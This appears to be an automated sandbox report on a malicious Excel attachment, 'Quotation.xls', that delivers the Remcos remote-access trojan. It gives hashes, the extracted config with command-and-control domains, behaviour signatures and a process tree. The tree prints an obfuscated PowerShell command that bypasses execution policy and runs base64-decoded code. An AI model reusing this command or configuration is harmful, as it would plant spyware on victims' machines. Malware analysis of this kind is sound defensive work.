Analysis
- max time kernel: 148s
- max time network: 155s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 24-07-2024 10:30
Tasks
- Static task: static1
- Behavioral task: behavioral1 (sample Quotation.xls, resource win7-20240704-en)
- Behavioral task: behavioral2 (sample Quotation.xls, resource win10v2004-20240709-en)
General
- Target: Quotation.xls
- Size: 1.0MB
- MD5: 7a9a6e2a484c942e9247513bf8420f13
- SHA1: 9a0399a2c75537687cdcaa939adb4a871b56f26e
- SHA256: c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
- SHA512: a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c
- SSDEEP: 24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu
Malware Config
Extracted: remcos
2556
bossnacarpet.com:2556
vegetachcnc.com:2556
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: chrome-6W1HCC
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures
- Blocklisted process makes network request (3 IoCs)
    flow  pid   Process
    8     2904  mshta.exe
    9     2904  mshta.exe
    11    2760  powershell.exe
- Downloads MZ/PE file
- Evasion via Device Credential Deployment (1 IoC)
    pid   Process
    2760  powershell.exe
- Executes dropped EXE (1 IoC)
    pid   Process
    1108  winiti.exe
- Loads dropped DLL (1 IoC)
    pid   Process
    2760  powershell.exe
- Drops file in System32 directory (1 IoC)
    description: File opened for modification
    ioc: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
    Process: powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
    description                          pid   Process     procid_target
    PID 1108 set thread context of 2884  1108  winiti.exe  41
- Detected phishing page
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
    description  ioc                                                          Process
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  regsvcs.exe
    Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 1 IoC)
    description  ioc                                                                   Process
    Key opened   \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor  EXCEL.EXE
- Modifies Internet Explorer settings
    description  ioc                                                                                                        Process
    Key created  \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
    pid   Process
    1356  EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
    pid   Process
    2760  powershell.exe
    2760  powershell.exe
    2760  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
    description              pid   Process
    Token: SeDebugPrivilege  2760  powershell.exe
- Suspicious use of SetWindowsHookEx (7 IoCs)
    pid   Process    entries
    1356  EXCEL.EXE  7
- Suspicious use of WriteProcessMemory (36 IoCs; identical entries grouped, with their count in the last column)
    description                       pid   Process         procid_target  entries
    PID 2904 wrote to memory of 2608  2904  mshta.exe       32             4
    PID 2608 wrote to memory of 2760  2608  cmd.exe         34             4
    PID 2760 wrote to memory of 1652  2760  powershell.exe  35             4
    PID 1652 wrote to memory of 2232  1652  csc.exe         36             4
    PID 2760 wrote to memory of 1108  2760  powershell.exe  39             4
    PID 1108 wrote to memory of 2884  1108  winiti.exe      41             16
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 1356)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\mshta.exe (PID 2904)
  Command line: C:\Windows\SysWOW64\mshta.exe -Embedding
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 2608)
    Command line: "C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2760)
      Command line: PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'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'+[chAR]0x22+'))')))"
      - Blocklisted process makes network request
      - Evasion via Device Credential Deployment
      - Loads dropped DLL
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 1652)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 2232)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"
          - System Location Discovery: System Language Discovery
      - C:\Users\Admin\AppData\Roaming\winiti.exe (PID 1108)
        Command line: "C:\Users\Admin\AppData\Roaming\winiti.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe (PID 2884)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
          - System Location Discovery: System Language Discovery
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta (8KB)
- Seven further downloaded files without a recorded path, of sizes 1KB, 3KB, 7KB, 2.2MB, 652B, 461B and 309B